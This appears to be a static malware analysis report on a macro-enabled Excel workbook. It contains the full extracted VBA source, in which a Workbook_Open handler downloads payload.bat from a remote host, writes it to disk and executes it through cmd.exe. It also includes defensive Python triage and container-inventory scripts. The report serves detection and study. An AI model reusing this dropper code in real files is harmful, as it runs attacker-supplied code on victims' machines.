Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 b6d44a32d7a3d96b…

Verdict: MALICIOUS

File type: Office (OOXML)

Size: 35.0 KB
Created: 2021-08-10 19:03:47 UTC
Authoring application: Microsoft Excel 16.0300
First seen: 2021-09-27
MD5: 6d6ea894846795845184e01301a3a1bf
SHA-1: f3de96ce6da9ee2b83a120c1da7d429f182739a4
SHA-256: b6d44a32d7a3d96be4fe3ec3bda84baff0239b7a98b816fdcc6aecb7ccdd9e8a
Risk score: 230

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1105 Ingress Tool Transfer
  • T1071.001 Application Layer Protocol: Web Protocols

The VBA project has a Workbook_Open handler in the ThisWorkbook module, so the code runs as soon as the document is opened with macros enabled. It instantiates Microsoft.XMLHTTP through CreateObject, issues a synchronous GET to 'http://demo.ryanrasmuss.com/download/payload.bat', writes the response body through an ADODB.Stream (Type = 1, binary; SaveToFile option 2, create-or-overwrite) to 'payload.bat' in the workbook's own directory, and then launches it with Shell "cmd.exe /k cd <workbook path> && payload.bat". That is a complete download, drop and execute chain needing no user action beyond enabling macros. The Sheet1 module carries the same steps split across six CommandButton handlers: CommandButton3 fetches 'data.csv' and saves it as 'payload.csv', CommandButton5 fetches 'payload.bat', CommandButton6 runs it and CommandButton4 deletes it. Every download routine keeps a commented-out URL pointing at the private address 192.168.1.10, and the sheet writes strings such as 'Hello from test button'; this is consistent with a test or proof-of-concept build, but the Workbook_Open path is fully functional and the live URLs resolve to a public host.

Heuristics (7)

  • VBA project inside OOXML  [medium]  OOXML_VBA  (5 related findings)
    Document contains a VBA project (VBA macros present).
  • Potential Shell call in VBA  [critical]  OLE_VBA_SHELL
    Potential Shell call in VBA.
    Matched line in script:
        Shell "cmd.exe /k cd " & ThisWorkbook.Path & " && payload.bat"
  • VBA downloads and writes a file to disk  [critical]  OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Together with the auto-exec (Workbook_Open) and Shell findings this makes the document a download-and-drop dropper. The rule keys on the responseBody/SaveToFile pattern rather than on the COM ProgID strings, so it still fires when the CreateObject arguments are assembled at runtime to evade keyword scanning; in this sample the ProgIDs are plain literals.
    Matched line in script:
        objStream.Write objXmlHTTpReq.responseBody
  • CreateObject call  [high]  OLE_VBA_CREATEOBJ
    CreateObject call.
    Matched line in script:
        Set objXmlHTTpReq = CreateObject("Microsoft.XMLHTTP")
  • cmd.exe reference in VBA  [high]  OLE_VBA_CMD
    cmd.exe reference in VBA.
    Matched line in script:
        Shell "cmd.exe /k cd " & ThisWorkbook.Path & " && payload.bat"
  • Workbook_Open macro  [low]  OLE_VBA_WBOPEN
    Auto-exec handler: runs when the workbook is opened with macros enabled.
    Matched line in script:
        Private Sub Workbook_Open()
  • Embedded URL  [info]  EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label tells which channel (macro, JS, link annotation, document body, ...) reached it.
    • http://192.168.1.10/download/data.csv  (referenced by macro; present only in commented-out lines, so it is never requested at runtime)
    • http://demo.ryanrasmuss.com/download/data.csv  (referenced by macro; fetched by CommandButton3_Click)
    • http://demo.ryanrasmuss.com/download/payload.bat  (referenced by macro; fetched and executed by Workbook_Open, also fetched by CommandButton5_Click)
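To make the chain behind these findings checkable outside the analysis platform, here is an added Python triage script. It is not part of oletools or of the tool that produced this report. It splits olevba-style VBA output into procedures, marks which stage each procedure implements (HTTP download via an XMLHTTP/WinHttp ProgID, ADODB.Stream drop via SaveToFile, execution via Shell or cmd.exe), flags a procedure as a dropper only when all three stages sit in an auto-exec handler, and lists every URL together with whether it is live or appears only in a commented-out line. The input is a constructed, shortened excerpt of the macro listed below; the stage regexes, the auto-exec name set and the MALICIOUS/SUSPICIOUS/CLEAN labels are this example's own choices, not the platform's.

```python
"""Triage extracted VBA source for the download-drop-execute chain.

Added example for this report (not oletools, not the analysis platform).
Feed it the text that olevba writes out; here it runs on a constructed
excerpt of the macro shown in the artifact preview so it works offline.
"""
import re
from dataclasses import dataclass, field

# Constructed input: abbreviated CommandButton3_Click and Workbook_Open
# handlers copied from the listing, keeping the commented-out private-IP URL.
SAMPLE_VBA = r'''
Private Sub CommandButton3_Click()
    ' FileURL = "http://192.168.1.10/download/data.csv"
    FileURL = "http://demo.ryanrasmuss.com/download/data.csv"
    Set objXmlHTTpReq = CreateObject("Microsoft.XMLHTTP")
    objXmlHTTpReq.Open "GET", FileURL, False
    objXmlHTTpReq.send
    Set objStream = CreateObject("ADODB.Stream")
    objStream.SaveToFile ThisWorkbook.Path & "\" & "payload.csv", 2
End Sub

Private Sub Workbook_Open()
    ' FileURL = "http://192.168.1.10/download/data.csv"
    FileURL = "http://demo.ryanrasmuss.com/download/payload.bat"
    Set objXmlHTTpReq = CreateObject("Microsoft.XMLHTTP")
    objXmlHTTpReq.Open "GET", FileURL, False
    objXmlHTTpReq.send
    Set objStream = CreateObject("ADODB.Stream")
    objStream.Write objXmlHTTpReq.responseBody
    objStream.SaveToFile ThisWorkbook.Path & "\" & "payload.bat", 2
    Shell "cmd.exe /k cd " & ThisWorkbook.Path & " && payload.bat"
End Sub
'''

# Handler names Office runs without a click (this example's own list).
AUTOEXEC = {"Workbook_Open", "Auto_Open", "Document_Open", "AutoOpen"}
URL_RE = re.compile(r'https?://[^\s"\']+')
PROC_RE = re.compile(r'^\s*(?:Private|Public)?\s*Sub\s+(\w+)\s*\(', re.I)
STAGE_PATTERNS = {
    "download": re.compile(r'CreateObject\("(?:Microsoft\.XMLHTTP|MSXML2\.[\w.]+'
                           r'|WinHttp\.WinHttpRequest[\w.]*)"\)', re.I),
    "drop": re.compile(r'\.SaveToFile\b', re.I),
    "execute": re.compile(r'\bShell\b|cmd\.exe|WScript\.Shell', re.I),
}


@dataclass
class Procedure:
    name: str
    lines: list = field(default_factory=list)

    def live_lines(self):
        # A VBA comment starts at an apostrophe outside a string literal. None
        # of this macro's strings contain an apostrophe, so a plain split is
        # safe here; a general parser must track quotes.
        return [ln.split("'", 1)[0] for ln in self.lines]

    def urls(self):
        """(url, live) pairs; live is False when the URL is only in a comment."""
        out = []
        for raw, live in zip(self.lines, self.live_lines()):
            for u in URL_RE.findall(raw):
                out.append((u, u in live))
        return out


def split_procedures(src):
    procs, cur = [], None
    for line in src.splitlines():
        m = PROC_RE.match(line)
        if m:
            cur = Procedure(m.group(1))
            procs.append(cur)
        elif cur is not None:
            if re.match(r'^\s*End Sub\b', line, re.I):
                cur = None
            else:
                cur.lines.append(line)
    return procs


def triage(src):
    """Per-procedure stage map; 'dropper' needs all three stages in an auto-exec handler."""
    report = {}
    for p in split_procedures(src):
        live = "\n".join(p.live_lines())          # ignore commented-out code
        stages = {k: bool(rx.search(live)) for k, rx in STAGE_PATTERNS.items()}
        autoexec = p.name in AUTOEXEC
        report[p.name] = {"autoexec": autoexec, "stages": stages, "urls": p.urls(),
                          "dropper": autoexec and all(stages.values())}
    return report


def verdict(report):
    if any(r["dropper"] for r in report.values()):
        return "MALICIOUS"
    if any(r["stages"]["download"] and r["stages"]["drop"] for r in report.values()):
        return "SUSPICIOUS"        # drops a file but needs a click or lacks execution
    return "CLEAN"


if __name__ == "__main__":
    rep = triage(SAMPLE_VBA)
    for name, r in rep.items():
        print(name, r["stages"], "auto-exec" if r["autoexec"] else "click-triggered",
              "DROPPER" if r["dropper"] else "")
        for u, live in r["urls"]:
            print("   ", u, "(live)" if live else "(commented out)")
    print(verdict(rep))
```

Run against the full macros.bas carved below, CommandButton5_Click and CommandButton6_Click each show only part of the chain (they are click-triggered and each holds one stage short of the full set), while Workbook_Open carries all three and is auto-exec, which is exactly what separates the critical verdict from a merely suspicious download routine.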

Extracted artifacts (8)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3874 bytes
SHA-256: cf7ca7675207c32f26a16542bdc503bd6d033a93f971dc49fa54bc218a07faed
Preview of the extracted script (the viewer shows up to 1,000 lines; this one fits in full):
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "CommandButton1, 1, 0, MSForms, CommandButton"
Attribute VB_Control = "CommandButton2, 2, 1, MSForms, CommandButton"
Attribute VB_Control = "CommandButton3, 3, 2, MSForms, CommandButton"
Attribute VB_Control = "CommandButton4, 4, 3, MSForms, CommandButton"
Attribute VB_Control = "CommandButton5, 5, 4, MSForms, CommandButton"
Attribute VB_Control = "CommandButton6, 6, 5, MSForms, CommandButton"
Private Sub CommandButton1_Click()

Range("A1").Value = "Hello from test button"

End Sub

Private Sub CommandButton2_Click()

Range("A1").Clear
Range("A2").Clear

End Sub

Private Sub CommandButton3_Click()

    Dim FileURL As String
    Dim objXmlHTTpReq As Object
    Dim objStream As Object
    
    ' FileURL = "http://192.168.1.10/download/data.csv"
    FileURL = "http://demo.ryanrasmuss.com/download/data.csv"
    
    Set objXmlHTTpReq = CreateObject("Microsoft.XMLHTTP")
    objXmlHTTpReq.Open "GET", FileURL, False
    objXmlHTTpReq.send
    
    If objXmlHTTpReq.Status = 200 Then
        Set objStream = CreateObject("ADODB.Stream")
        objStream.Open
        objStream.Type = 1
        objStream.Write objXmlHTTpReq.responseBody
        objStream.SaveToFile ThisWorkbook.Path & "\" & "payload.csv", 2
        objStream.Close
    End If


End Sub

Private Sub CommandButton4_Click()

    ' Kill (ThisWorkbook.Path & "\" & "payload.csv")
    Kill (ThisWorkbook.Path & "\" & "payload.bat")

End Sub

Private Sub CommandButton5_Click()
' Download real payload executable

    Dim FileURL As String
    Dim objXmlHTTpReq As Object
    Dim objStream As Object
    
    ' FileURL = "http://192.168.1.10/download/data.csv"
    FileURL = "http://demo.ryanrasmuss.com/download/payload.bat"
    
    Set objXmlHTTpReq = CreateObject("Microsoft.XMLHTTP")
    objXmlHTTpReq.Open "GET", FileURL, False
    objXmlHTTpReq.send
    
    If objXmlHTTpReq.Status = 200 Then
        Set objStream = CreateObject("ADODB.Stream")
        objStream.Open
        objStream.Type = 1
        objStream.Write objXmlHTTpReq.responseBody
        objStream.SaveToFile ThisWorkbook.Path & "\" & "payload.bat", 2
        objStream.Close
    End If
    
    
    
    

End Sub

Private Sub CommandButton6_Click()
    ' below works well without reusability
    Shell "cmd.exe /k cd " & ThisWorkbook.Path & " && payload.bat"

    
End Sub

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()

Range("A2").Value = "This is populated when file is open"

'download payload

Dim FileURL As String
Dim objXmlHTTpReq As Object
Dim objStream As Object
    
' FileURL = "http://192.168.1.10/download/data.csv"
FileURL = "http://demo.ryanrasmuss.com/download/payload.bat"
    
Set objXmlHTTpReq = CreateObject("Microsoft.XMLHTTP")
objXmlHTTpReq.Open "GET", FileURL, False
objXmlHTTpReq.send
    
If objXmlHTTpReq.Status = 200 Then
    Set objStream = CreateObject("ADODB.Stream")
    objStream.Open
    objStream.Type = 1
    objStream.Write objXmlHTTpReq.responseBody
    objStream.SaveToFile ThisWorkbook.Path & "\" & "payload.bat", 2
    objStream.Close
End If
    
' below works well without reusability
Shell "cmd.exe /k cd " & ThisWorkbook.Path & " && payload.bat"


End Sub
vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 33792 bytes
SHA-256: 93e5373b22880b10aa6d8bebe8a2d000fef25e3dc731cc32ac5c947c747ec154
emf_00.emf | ooxml-emf | OOXML EMF part: xl/media/image3.emf | 2784 bytes
SHA-256: 4e7691aec648ee92cfe2bcb85209d9edc57b4cf29daf89d8ec8fdfadaab31c18
emf_01.emf | ooxml-emf | OOXML EMF part: xl/media/image1.emf | 2620 bytes
SHA-256: 3cc5ce08965d56848f4e971e9d4cd8dbdde07a0edc94909892aa18d785867bce
emf_02.emf | ooxml-emf | OOXML EMF part: xl/media/image5.emf | 2820 bytes
SHA-256: 8f8cea54ebe69ed2ff9478da3232161a363201a5c41339771a0db3f937c7dc10
emf_03.emf | ooxml-emf | OOXML EMF part: xl/media/image6.emf | 2772 bytes
SHA-256: daea7a74d492cde8ee1ba366bcbeb6d1be3badb8f5323c6cd1b22d08273bcd23
emf_04.emf | ooxml-emf | OOXML EMF part: xl/media/image2.emf | 2700 bytes
SHA-256: 3f237613a20d53bac25ccaeabb58071ac15d40f19f97d51e7f36770ce7a86612
emf_05.emf | ooxml-emf | OOXML EMF part: xl/media/image4.emf | 2700 bytes
SHA-256: b7baa9dd8fa5637eeed8882926708ca6a9a4d0efe6730ce7c4e8d5b42c6f6516
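The artifact table above is the result of opening the OOXML container as a ZIP, hashing each part and classifying it by name and magic bytes. The following added Python script (not the carving tool used for this report) reproduces that inventory and adds the check a triager wants first: whether [Content_Types].xml declares a macro-enabled main part or a vbaProject part, which is the container's own statement of macro presence regardless of the file extension. Because the 35 KB sample itself is not on the page, the script builds a constructed minimal .xlsm in memory whose part names mirror the table; the part contents, sizes and hashes are placeholders and do not match the real artifacts.

```python
"""Inventory an OOXML container and flag macro carriers.

Added example for this report; it is not the tool that produced the
artifact table. The sample it inspects is constructed in memory.
"""
import hashlib
import io
import zipfile

# vbaProject.bin is an OLE2/CFB file; this is the CFB header signature.
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
VBA_CTYPE = "application/vnd.ms-office.vbaProject"
MACRO_MARKERS = ("macroEnabled", VBA_CTYPE)


def build_constructed_sample():
    """Constructed stand-in for the sample: real part names, placeholder bytes
    (the genuine xl/vbaProject.bin is 33792 bytes; this one is 512)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr(
            "[Content_Types].xml",
            '<?xml version="1.0"?>'
            '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
            '<Default Extension="emf" ContentType="image/x-emf"/>'
            '<Override PartName="/xl/workbook.xml" '
            'ContentType="application/vnd.ms-excel.sheet.macroEnabled.main+xml"/>'
            f'<Override PartName="/xl/vbaProject.bin" ContentType="{VBA_CTYPE}"/>'
            '</Types>')
        z.writestr("xl/workbook.xml", "<workbook/>")
        z.writestr("xl/vbaProject.bin", OLE_MAGIC + b"\x00" * 504)
        z.writestr("xl/media/image1.emf", b"\x01\x00\x00\x00" + b"\x00" * 60)
    return buf.getvalue()


def classify(name, data):
    """Kind labels follow the artifact table's vocabulary."""
    lower = name.lower()
    if lower.endswith("vbaproject.bin") or data.startswith(OLE_MAGIC):
        return "vba-project"          # OLE container inside the ZIP: macro storage
    if lower.endswith(".emf"):
        return "ooxml-emf"
    if lower.endswith((".xml", ".rels")):
        return "ooxml-xml"
    return "other"


def inventory(container_bytes):
    """One record per part: name, kind, uncompressed size, SHA-256 of the
    uncompressed bytes (what the artifact table lists)."""
    parts = []
    with zipfile.ZipFile(io.BytesIO(container_bytes)) as z:
        for info in z.infolist():
            data = z.read(info)
            parts.append({"name": info.filename,
                          "kind": classify(info.filename, data),
                          "size": len(data),
                          "sha256": hashlib.sha256(data).hexdigest()})
    return parts


def macro_enabled(container_bytes):
    """True when [Content_Types].xml declares a macro-enabled main part or a
    vbaProject part. Check this rather than trusting the extension."""
    with zipfile.ZipFile(io.BytesIO(container_bytes)) as z:
        ctypes = z.read("[Content_Types].xml").decode("utf-8", "replace")
    return any(marker in ctypes for marker in MACRO_MARKERS)


if __name__ == "__main__":
    sample = build_constructed_sample()
    print("macro-enabled:", macro_enabled(sample))
    print("Filename | Kind | Size")
    for p in inventory(sample):
        print(f"{p['name']} | {p['kind']} | {p['size']} bytes")
        print("SHA-256:", p["sha256"])
```

Point inventory() at the bytes of a real .xlsm and the vba-project row is the one to hand to olevba; a file whose extension says .xlsx but whose content types carry the vbaProject override deserves the same treatment.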